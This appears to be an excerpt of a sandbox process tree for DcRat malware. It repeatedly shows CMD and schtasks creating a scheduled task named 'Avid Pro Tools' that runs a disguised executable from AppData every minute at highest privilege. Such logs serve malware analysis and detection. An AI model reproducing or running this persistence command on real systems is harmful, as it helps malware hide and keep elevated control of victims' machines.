C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1164
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2044
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1572
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2020
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2692
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2756
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1884
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:3000
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1848
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1592
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1852
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
PID:2496
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:620
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:896
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1664
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2220
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2492
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:300
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2176
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2768
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2308
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:560
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1296
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2836
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1100
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1728
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2356
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
PID:1224
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2008
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1692
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2412
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2124
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:3020
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1640
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1608
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:1912
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2648
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2372
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1316
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2336
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2556
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2964
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2656
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:720
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2644
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1884
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:768
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1328
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:852
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2324
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:904
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:2600
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2312
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1344
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2640
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1796
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2372
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:768
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1472
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
PID:1936
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:796
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2700
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:316
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2364
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1920
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1676
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1692
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:576
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:916
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2860
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2932
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1948
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2880
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2112
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2396
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1688
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1712
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1724
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1868
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2152
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1796
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1252
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:556
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
PID:2944
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2984
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2660
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2308
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1224
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1944
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1748
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2044
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
PID:2804
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:3032
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵
- DcRat
- Scheduled Task/Job: Scheduled Task
PID:2124
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1568
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2656
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1608
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2392
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1936
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2328
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2940
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:936
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2664
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2436
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2096
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2360
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2632
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1384
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2088
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1588
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2664
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2700
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2360
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2788
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2768
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2040
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1080
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:2624
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:1892
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1656
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2908
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1576
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2492
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1932
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2268
-
C:\Windows\system32\schtasks.exeSchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST4⤵PID:1008
-
-
-
C:\Windows\system32\CMD.exe"CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit3⤵PID:2604
-
